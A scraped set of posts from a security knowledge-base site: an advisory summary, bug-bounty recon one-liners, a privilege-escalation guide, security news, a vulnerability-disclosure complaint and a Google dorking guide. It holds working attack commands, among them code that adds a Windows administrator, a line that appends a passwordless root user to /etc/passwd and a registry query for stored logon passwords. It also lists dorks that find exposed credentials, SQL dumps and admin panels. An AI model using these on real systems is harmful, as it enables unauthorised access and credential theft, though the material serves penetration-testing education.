Secure by Design and Default: Follow the Secure Software Development Framework (SSDF) and implement secure design practices throughout the software development life cycle (SDLC). Establish a coordinated vulnerability disclosure program to address discovered vulnerabilities.

Secure-By-Default Configurations: Prioritize secure-by-default configurations such as eliminating default passwords and providing high-quality audit logs with no additional configuration.

For End-User Organizations

Timely Patching: Apply timely patches to systems, prioritizing known exploited and critical vulnerabilities.

Multifactor Authentication (MFA): Enforce phishing-resistant MFA for all users, especially for remote access.

Network Protection: Properly configure and secure internet-facing network devices, disable unused network ports, protocols, and services, and use web application firewalls to monitor and filter web traffic.

Identity and Access Management (IAM): Enforce least privilege, regularly review and validate privileged accounts, and control the use of native scripting applications.

Vulnerability and Configuration Management: Update software and firmware promptly, conduct regular system backups, and maintain an updated incident response plan.

Final Thoughts

The joint Cybersecurity Advisory (CSA) from leading cybersecurity agencies serves as a crucial resource to understand the threat landscape of 2022. By prioritizing secure-by-design principles, timely patching, and robust identity and access management, both vendors and end-user organizations can significantly reduce the risk of compromise by malicious cyber actors. A collaborative effort between stakeholders and the adoption of best practices can pave the way for a more secure digital environment.

The article is largely based on the CyberSecurity Advisory released by CISA.gov in August 2023. See original advisory at cisa.gov

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

Bug Bounty -{ Oneliner Commands } – { V2 }

0

🔰 { One-Liner } – Extract all URLs from Source Code

➡️ curl "https://example .com/" | grep -oP '(https*://|www\.)[^ ]*' 

🔰 { One-Liner } – Subdomain Extraction

Find Subdomain from VirusTotal

➡️ curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from Archive

➡️ curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

See 👇🌿

Find JavaScript File

➡️ assetfinder --subs-only HOST | gau | egrep -v '(.css| .png| .jpeg| .jpg|  .svg|  .gif| .wolf)' | while read url ;do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_l+" | sed -e 's, 'var', '"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo e "\e[1;33m$url\n" "\e[1;32m$vars"; done
Finding Js Files

credits: https://bugbountyguide.org/bash-one-liner-automation-for-bug-bounty/

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

Web Application Security Mindmap

0
cybersecurity

In an ever-evolving digital landscape, web application security has become a paramount concern for businesses, organizations, and individuals alike. The rapid growth of web technologies and their increasing complexity have left vulnerabilities that malicious actors seek to exploit.

Bookmark
ClosePlease login

Privilege Escalation Techniques & Resources

0
privilege escalation

Welcome to the Privilege Escalation Resources guide! This comprehensive compilation aims to provide you with essential information and tools to understand and address privilege escalation techniques on both Linux and Windows systems. Privilege escalation refers to the process of elevating user privileges to gain unauthorized access to sensitive resources or perform critical actions.

In this guide, we will explore various resources and methodologies to identify potential vulnerabilities and weaknesses in a system, allowing you to escalate privileges and gain deeper access. We will cover websites, tools, code snippets, and techniques commonly used by security professionals to assess and strengthen the security of their systems.

Whether you are a seasoned cybersecurity expert or a curious individual looking to learn more about security practices, this guide offers valuable insights and practical knowledge to enhance your understanding of privilege escalation. Let’s dive into the world of privilege escalation and arm ourselves with the knowledge needed to protect our systems effectively.

  1. GTFOBins – A collection of Unix binaries that can be used for privilege escalation. Website: https://gtfobins.github.io/
  2. Linux Privilege Escalation Fundamentals – Comprehensive guide on Linux privilege escalation. Website: https://guif.re/linuxeop
  3. Windows Privilege Escalation Fundamentals – Detailed resource for Windows privilege escalation. Website: https://guif.re/windowseop
  4. FuzzySecurity – Windows Privilege Escalation Fundamentals – In-depth tutorial on Windows privilege escalation. Website: http://www.fuzzysecurity.com/tutorials/16.html
  5. Payatu – Guide to Linux Privilege Escalation – A guide on Linux privilege escalation. Website: https://payatu.com/guide-linux-privilege-escalation

Linux Privilege Escalation Techniques

  • Checking sudo privileges (sudo -l)
  • Exploiting kernel vulnerabilities (Kernel Exploits)
  • Leveraging vulnerabilities in the operating system (OS Exploits)
  • Exploiting password reuse in various files (MySQL, .bash_history, 000-default.conf, etc.)
  • Identifying binaries with the suid flag and interactive mode (e.g., nmap)
  • Exploiting custom binaries with the suid flag, either through other binaries or command execution
  • Exploiting writable files owned by root, executed through cron jobs
  • Gaining MySQL access as root
  • Exploiting vulnerable services like chkrootkit and logrotate
  • Gaining access to sensitive files like /etc/passwd and .bash_history
  • Obtaining SSH private keys and public keys with a predictable PRNG
  • Monitoring listening ports on localhost for potential vulnerabilities
  • Checking /etc/fstab, /etc/exports, and /var/mail for exploitable configurations
  • Executing processes as other users (root) to modify something you have permissions for

Windows Privilege Escalation Techniques

  • Leveraging kernel exploits and OS vulnerabilities (Kernel Exploits, OS Exploits)
  • Pass The Hash attack method
  • Exploiting password reuse
  • DLL hijacking through the PATH
  • Exploiting vulnerable services and writable service binaries path
  • Identifying unquoted service paths for exploitation
  • Monitoring listening ports on localhost for potential vulnerabilities
  • Investigating registry keys for exploitable configurations

Kernel Exploits Repositories

Windows Privilege Escalation Guides

Sample Windows Code for User Addition:

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main() {
    int i;
    i = system("net user <username> <password> /add && net localgroup administrators <username> /add");
    return 0;
}

Linux Privilege Escalation Techniques

  • Finding binaries with the suid, sgid, or sticky bit set:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
  • Finding writable files and directories:
find / -writable -type f 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
find /etc/ -writable -type f 2>/dev/null
  • Identifying SUID/GUID binaries owned by root:
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

Windows Exploit Suggester:

python windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls

Windows Privilege Escalation Techniques

  • Checking registry settings for AlwaysInstallElevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Basic Linux Enumeration

  • Finding distribution type and kernel version:
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
  • Checking default writable directories:
/tmp
/dev/shm
  • Searching for passwords in files like config.php:
grep -R 'password' config.php
  • Finding other writable directories and folders:
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
  • Identifying services running as root user:
ps aux | grep root
ps -ef | grep root
  • Listing installed applications and packages:
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives
ls -lah /var/cache/yum/
  • Checking scheduled jobs:
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
  • Searching for patterns in files:
grep -rnw '/etc/passwd' -e 'root'

Sticky Bit, SGID, SUID, GUID

  • Sticky Bit:
find / -perm -1000 -type d 2>/dev/null
  • SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
  • SUID (chmod 4000):
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
  • SUID or GUID:
find / -perm -g=s

 -o -perm -u=s -type f 2>/dev/null

Adding a user to /etc/passwd and the root group

echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

Surge in threat activity in OT and IoT environments

0
CyberSecurity

Malware-related cyber-threats in operational technology (OT) and Internet of Things (IoT) environments jumped tenfold year-on-year in the first six months of 2023, according to Nozomi Networks.

The security vendor compiled its latest Nozomi Networks Labs OT & IoT Security Report from ICS vulnerabilities, data from IoT honeypots and attack statistics from OT environments.

“Specific to malware, denial-of-service (DoS) activity remains one of the most prevalent attacks against OT systems,” the vendor explained in a blog post announcing the report.

Continue reading on InfoSecurity-Magazine

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

WebBoss.io CMS Concerns: A Tale of Neglect and Unresponsiveness

0

In the world of cybersecurity, the safeguarding of sensitive data and the protection of users’ privacy are of paramount importance. Companies that offer Software as a Service (SaaS) are entrusted with the responsibility of maintaining robust security practices to prevent unauthorized access and potential breaches. Unfortunately, one such SaaS provider, WebBoss.io, has fallen short of these expectations. The company’s repeated lack of transparency regarding disclosed vulnerabilities raises serious concerns about their commitment to user safety and the protection of sensitive data.

As an independent researcher, I recently foundmyself revisitng a vendor one year on. To my surprise, there was more to find, more to disclose, highlighting serious flaws that could jeopardize user data and the overall integrity of the system. The vulnerabilities reported included Reflected XSS, Insecure Direct Object Reference (IDOR), and other critical issues. However, instead of promptly addressing these concerns, WebBoss.io’s response was lackluster and ineffective, raising significant questions about their commitment to cybersecurity.

Critical Vulnerabilities Left Unresolved

Among the vulnerabilities disclosed, the most alarming was the Critical Insecure Direct Object Reference (IDOR) vulnerability (CVE-2023–36339), which took the SaaS provider 59 days to address. Despite the severity of this issue, WebBoss.io failed to provide a specific date for the patch, and no mitigation measures were ever taken to protect users until the remediation process was complete, 59 days later. This flaw allows attackers to access the Website Backup Tool via a crafted GET request, leading to unauthorized access and data breaches.

Further Context

Rewind back to 2022, I responsibly disclosed security vulnerabilities to WebBoss.io, as part of my commitment to improving cybersecurity across the digital landscape. These disclosures included issues, such as Reflected XSS (CVE-2023–37742), that could potentially allow attackers to execute malicious code on users’ browsers. While WebBoss.io reportedly applied a “Security Hotfix” to address the vulnerabilities, they failed to inform their customers about the specific issues, hindering users’ understanding of the urgency and importance of updating their systems, and most importantly they did not apply an adequate patch as vulnerable vectors (including the exact same one) were eveidently still present one year on. This worrisome sign, and the fact that a plethora of security issues were again identified suggests that WebBoss.io fails to perform its own security testing /assessments— either by 3rd party or otherwise, which is a crucial and essential practice for any reputable and compliant organization, particularly in today’s digital era where cyber threats and attacks are progressively more sophisticated and widespread.

Negligent Response and Transparency Lacking

In 2023, throughout the entire disclosure process, WebBoss.io exhibited a negligent response to the reported vulnerabilities. Their communication was often dismissive and failed to provide concrete timelines for fixes. The lack of transparency was evident when the company claimed to have notified all customers about the patches, but I did not receive such notification, despite being signed up to their platforn, only after I raised this with them in a ticket did the email arrive.. many hours later.. Additionally, the inital changelog released by WebBoss.io failed to mention the CVE IDs for the recently disclosed vulnerabilities, hindering transparency and accountability.

Important Of Transparency

Transparent communication is not merely a courtesy; it is a crucial aspect of security responsibility. When companies withhold critical information about vulnerabilities and security updates, they leave their users at risk. Without clear information, users may not recognize the severity of the situation or the urgency of applying patches. This lack of transparency undermines the trust users place in the company’s commitment to their security.

Disregard for Industry Best Practices

During my correspondence with WebBoss.io I highlighted several best practices and industry standards that WebBoss.io had evidently been disregarded, including vulnerability management, incident response and monitoring, customer notification, security assessments, and data privacy and protection. Neglecting these essential security measures raises serious concerns about WebBoss.io’s commitment to safeguarding their customers’ data and complying with relevant data protection regulations.

A Terrible Attempt Of Silencing The Situation

WebBoss.io malicously accused me of blackmail and involved the police, but the authorities swiftly dismissed the claim. I want to clarify that I never had any ulterior motive, nor did I make any demands. I simply told them if a patch was not released within 28 days, I would proceed with public disclosure.

Protecting User Data Should be Paramount

As a SaaS provider, WebBoss.io holds sensitive user data, which should makes security a top priority. However, their repeated lack of transparency raises questions about their dedication to protecting user data. Adequate disclosure of security vulnerabilities empowers users to take appropriate action, ensures they are aware of potential risks, and fosters a sense of trust between users and the company.

webboss ISO 27001

This lack of response and transparency from WebBoss.io is once-again both concerning and in direct contradiction to the principles of transparency and accountability that are integral to ISO 27001 certification that they boast on there website.

I must emphasize that ISO 27001 signifies adherence to stringent information security management standards, regulations, and best practices. My analysis has revealed evident, documented deviations from these requirements, which raises serious concerns about regulatory compliance and the security posture of the system involved and it’s users.

Final Thoughts

The handling of security disclosures by WebBoss.io has been riddled with negligence, unresponsiveness, and a lack of transparency. The delayed response to critical vulnerabilities and the failure to prioritize user data protection reveal a disconcerting lack of commitment to cybersecurity best practices.

As a responsible security researcher, I made every effort to highlight these vulnerabilities and prompt WebBoss.io to take appropriate action as swiftly as possible. Regrettably, the company’s response and handling has been inadequate, prompting me to seek public disclosure. This unfortunate situation could have been avoided had WebBoss.io demonstrated a more proactive approach to security, conducted their own due-dillegence and promptly addressed the reported vulnerabilities, or at they very least provide dates for patches.

As users of WebBoss.io’s SaaS services, it is essential to be vigilant and take precautionary measures to protect sensitive data when using this sytem. Customers should urge the company to prioritize security measures and demand transparency regarding the implementation of patches and future security enhancements.

Depending on your use-case for WebBoss.io’s CMS, It may be suggested to replace the affected object with an alternative, robust and transparent product.

As earilier stipulated, and well recognized, In the world of cyber, the protection of user data should be paramount. Sadly, WebBoss.io’s handling of security disclosures raises significant doubts about their commitment to ensuring the safety and privacy oUpdated 6th Aug 2023 — added more context.f their users.

Updated 6th Aug 2023 — added more context.

I reached out to webboss for comment, allowing them the opportunity to have their say, but have yet to recevive any response.

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

Chinese-Origin Hackers Breach US Government Systems

0
china

In mid-May, we and the security community reported on a noteworthy hacking campaign, orchestrated by Chinese hackers who successfully infiltrated several US government email accounts, including those belonging to federal agencies like the State Department and the Department of Commerce. Although the scale of the breach campaign was relatively small, its impact on unclassified systems raised concerns due to the targeted nature of the attacks, aimed at high-level individuals for espionage purposes.

See our original report of the incident:

A crucial role in identifying the Chinese hackers behind the breach was played by Microsoft’s threat research team. They managed to trace the origin of the attack and discern the specific information sought by the hackers. Interestingly, the attackers strategically employed forged authentication tokens to gain unauthorized access to high-level government email accounts across various agencies.

Predictably, China vehemently denied these accusations and instead accused the US government of engaging in aggressive hacking campaigns. Such a tit-for-tat response is not uncommon in the realm of cyber warfare, as both nations seek to gain advantages through their hacking capabilities.

Microsoft described the hackers’ modus operandi as “surgical,” signifying their method of precisely targeting specific individuals for espionage purposes. The attackers exploited a stolen Microsoft account consumer signing key to forge authentication tokens for government email accounts of interest. This allowed them to access emails via Outlook’s web feature (OWA) and Outlook.com. Fortunately, Microsoft acted swiftly, blocking the forged tokens and replacing the MSA key to neutralize further attacker activities.

Due to their sophisticated tactics, China is now regarded as the most technically advanced cyber adversary by US officials. This incident serves as a stark reminder of the ongoing cybersecurity challenges faced by governments and organizations worldwide, highlighting the importance of vigilance and continuous efforts to enhance cybersecurity measures.

This article is largely based on the orginal article that first appeared on CentralEyes.

Read the original post at: https://www.centraleyes.com/made-in-china-hack-infiltrates-the-us-government/

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

Mastering Google Dorking: Expanding Scope, Reconnaissance and Resources

0
Google Dorks

Google Dorking is a powerful technique that enables individuals to leverage advanced search operators and filters for comprehensive information gathering. By mastering Google Dorking, you can significantly expand your scope and enhance your reconnaissance capabilities. This guide aims to provide you with a wealth of knowledge and resources, including various advanced search strategies, a multitude of dorks, and practical examples to empower your search proficiency and improve your cybersecurity prowess.

Foundational Concepts

Let’s begin by delving deeper into the foundational concepts of Google Dorking, which will serve as building blocks for advanced techniques.

a) Keyword Inclusion (intext): Employ the “intext” operator to search for web pages containing specific keywords, allowing you to narrow down relevant search results, example intext:”Index of /private”
b) Site Restriction (site): Utilize the “site” operator to limit search results to a particular website or domain, providing you with focused and targeted information. example, site:realinfosec.net
c) Advanced Operators: Enhance your search queries with operators such as ‘-‘, ‘+’, and ‘*’, enabling you to refine and tailor your search results.

  • Minus (-): The minus operator aids in filtering out specific terms from search results. For instance, when searching for “Apple -fruit,” you’ll retrieve results related to the company Apple while excluding those related to the fruit.
  • Plus (+): The plus operator enables you to include specific terms in your search results. For example, searching for “cycling +safety” will provide results related to cycling that specifically include the term “safety.”
  • Asterisk (*): The asterisk operator serves as a wildcard and can be utilized to substitute unknown terms or complete phrases in a search. For instance, searching for “best * for beginners” will generate diverse recommendations, such as “best cybersecurity tools for beginners” or “best practices for beginners.”

Advanced Concepts Continued

Expand your search beyond conventional web pages and uncover potentially exposed Git repositories by using the following dork

  • Query: intext:”Index of /.git”

Identify Sensitive Files

Unearth sensitive files that may contain critical information using the following search queries

  • DB_PASSWORD filetype:env
  • Utilize search filters like “after:” to obtain the most recent results, as these are more likely to be promptly reported.

Locate ‘Admin Panels’

Find web pages associated with administrative panels using these search queries:

  • Query 1: inurl:"/admin" intitle:"admin login"
  • Query 2: inurl:"/admin2" intitle:"login"
  • Query 3: intitle:"login" intitle:"admin"

Misc dorks, mostly self-explanatory.

  • Query 1: intitle:"index of" inurl:ftp
  • Query 2: filetype:txt inurl:"email.txt" (
  • Query 3: intitle:"index of" inurl:ftp
  • Query 4: inurl:”php?q” inurl:”%20″ -pdf (removes pdf’s from results, searchers for php files with a q parameter, with spaces in the url)
  • Query 5: inurl:"%20"

inurl:”%20″ Explained

The “%20” is a URL encoding representation for a space character. In web URLs, spaces are not allowed and are typically replaced with “%20” to maintain the integrity of the URL structure.

So, when you use the search operator “inurl:” followed by “%20”, you are essentially searching for webpages whose URLs contain spaces represented by “%20”. This can be useful in scenarios where you are looking for specific URLs that may have spaces in them, such as directories or filenames. Combining this with other dorks can be very powerful.

The “ext:” Explained

Ext is for extensions/filetype, you can use either.

  • site:realinfosec.net ext:php (will return all php files for this domain
  • site:realinfosec.net ext:sql (would return all sql files for this domain)

Combine Operators for More Precise Results

Merge operators to achieve more granular search outcomes. For example, find login pages specifically on the Tesla website.

  • Query: intitle:”login” site:tesla.com

Leverage Publicly Submitted Dorks

Access a vast collection of publicly submitted dorks to enhance your Google Dorking endeavors. GHDB is a great starting point.

Simplify with Google’s Advanced Search Options

Optimize your searches by utilizing Google’s advanced search options, providing you with more control and precise results. Consider the following tips:
Resource: Explore the advanced search options available at https://www.google.com/advanced_search
Tip: Adjust the search region to obtain results and data specific to a particular geographical location, enabling you to focus on region-specific information.

Safeguarding Your Website from Search Engine Indexing

To protect your website from being indexed by search engines, implement the following measures.

  • a) Create a robots.txt file: Establish a robots.txt file and specify which folders should remain private, safeguarding sensitive information.
  • b) Broader Scope for Sensitive Folders: By indicating the existence of valuable content in restricted folders, potential attackers may be discouraged from targeting your site.
  • c) Allow List for Searchable Pages: Include an allow list to permit search engines to index desired pages, such as blogs, enhancing SEO performance.

Uncover Bug Bounty Programs beyond Major Platforms

Broaden your bug bounty program scope by identifying programs that are not listed on major platforms such as hackerone or bugcrowd. Expand your search using the following strategies.

Icrease your scope by exploring additional avenues and platforms for bug bounty programs.

  • Identify Bugcrowd Users Not Listed on Bugcrowd:
  • Discover bug bounty programs that utilize Bugcrowd but are not explicitly listed on the platform with the following dork
  • Query: intext:”Powered by Bugcrowd” -site:bugcrowd.com

Find Scanner Reports

Gain access to scanner reports generated by popular security tools with the following dorks.

  • Query 1: intitle:”report” (“qualys” | “acunetix” | “nessus” | “netsparker” | “nmap”) filetype:html
  • Query 2: intitle:”report” (“qualys” | “acunetix” | “nessus” | “netsparker” | “nmap”) filetype:pdf

More google dork resources:

By mastering the advanced techniques of Google Dorking, leveraging the vast array of dorks and resources provided, you will empower yourself to conduct comprehensive reconnaissance, enhance your cybersecurity defenses, up your bug-bounty  game and stay ahead of potential threats.

2023 Google Dorks:

The below list was obtained from, https://gbhackers.com/latest-google-dorks-list/

_news/news.php?id=
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
!Host=*.* intext:enc_UserPassword=* ext:pcf
?action=
?cat=
?id=
?intitle:index.of? mp3 artist-name-here
?intitle:index.of? mp3 name
?page=
?pagerequested=
?pid=
" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
": vBulletin Version 1.1.5"
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"A syntax error has occurred" filetype:ihtml
"About Mac OS Personal Web Sharing"
"access denied for user" "using password"
"allow_call_time_pass_reference" "PATH_INFO"
"An illegal character has been found in the statement" -"previous message"
"apricot - admin" 00h
"ASP.NET_SessionId" "data source="
"AutoCreate=TRUE password=*"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Can't connect to local" intitle:warning
"Certificate Practice Statement" inurl:(PDF | DOC)
"Chatologica MetaSearch" "stack tracking:"
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"Duclassified" -site:duware.com "DUware All Rights reserved"
"duclassmate" -site:duware.com
"Dudirectory" -site:duware.com
"dudownload" -site:duware.com
"Dumping data for table"
"DUpaypal" -site:duware.com
"Elite Forum Version *.*"
"Emergisoft web applications are a part of our"
"Error Diagnostic Information" intitle:"Error Occurred While"
"error found handling the request" cocoon filetype:xml
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"Fatal error: Call to undefined function" -reply -the -next
"ftp://" "www.eastgame.net"
"Host Vulnerability Summary Report"
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"html allowed" guestbook
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"http://*:*@www" domainname
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"Incorrect syntax near"
"Index of /" +.htaccess
"Index of /" +passwd
"Index of /" +password.txt
"Index of /admin"
"Index of /backup"
"Index of /mail"
"Index Of /network" "last modified"
"Index of /password"
"index of /private" -site:net -site:com -site:org
"index of /private" site:mil
"Index of" / "chat/logs"
"index of/" "ws_ftp.ini" "parent directory"
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"Installed Objects Scanner" inurl:default.asp
"Internal Server Error" "server at"
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"intitle:index of"
"Invision Power Board Database Error"
"Link Department"
"liveice configuration file" ext:cfg
"liveice configuration file" ext:cfg -site:sourceforge.net
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
"Microsoft CRM : Unsupported Browser Version"
"More Info about MetaCart Free"
"Most Submitted Forms and s?ri?ts" "this section"
"Most Submitted Forms and Scripts" "this section"
"mysql dump" filetype:sql
"mySQL error with query"
"Network Host Assessment Report" "Internet Scanner"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"OPENSRS Domain Management" inurl:manage.cgi
"ORA-00921: unexpected end of SQL command"
"ORA-00933: SQL command not properly ended"
"ORA-00936: missing expression"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Output produced by SysWatch *"
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory" +proftpdpasswd
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"pcANYWHERE EXPRESS Java Client"
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
"phpMyAdmin MySQL-Dump" filetype:txt
"phpMyAdmin" "running on" inurl:"main.php"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"PostgreSQL query failed: ERROR: parser: parse error"
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Powered by mnoGoSearch - free web search engine software"
"powered by openbsd" +"powered by apache"
"Powered by UebiMiau" -site:sourceforge.net
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"sets mode: +k"
"sets mode: +p"
"sets mode: +s"
"Shadow Security Scanner performed a vulnerability assessment"
"site info for" "Enter Admin Password"
"SnortSnarf alert page"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
"SquirrelMail version" "By the SquirrelMail development Team"
"Supplied argument is not a valid MySQL result resource"
"Supplied argument is not a valid PostgreSQL result"
"Syntax error in query expression " -the
"SysCP - login"
"Thank you for your order" +receipt
"The following report contains confidential information" vulnerability -search
"The s?ri?t whose uid is " "is not allowed to access"
"The script whose uid is " "is not allowed to access"
"The statistics were last upd?t?d" "Daily"-microsoft.com
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This is a Shareaza Node"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"This report was generated by WebLog"
"This section is for Administrators only. If you are an administrator then please"
"This summary was generated by wwwstat"
"Traffic Analysis for" "RMON Port * on unit *"
"ttawlogin.cgi/?action="
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Version Info" "Boot Version" "Internet Settings"
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"Web File Browser" "Use regular expression"
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
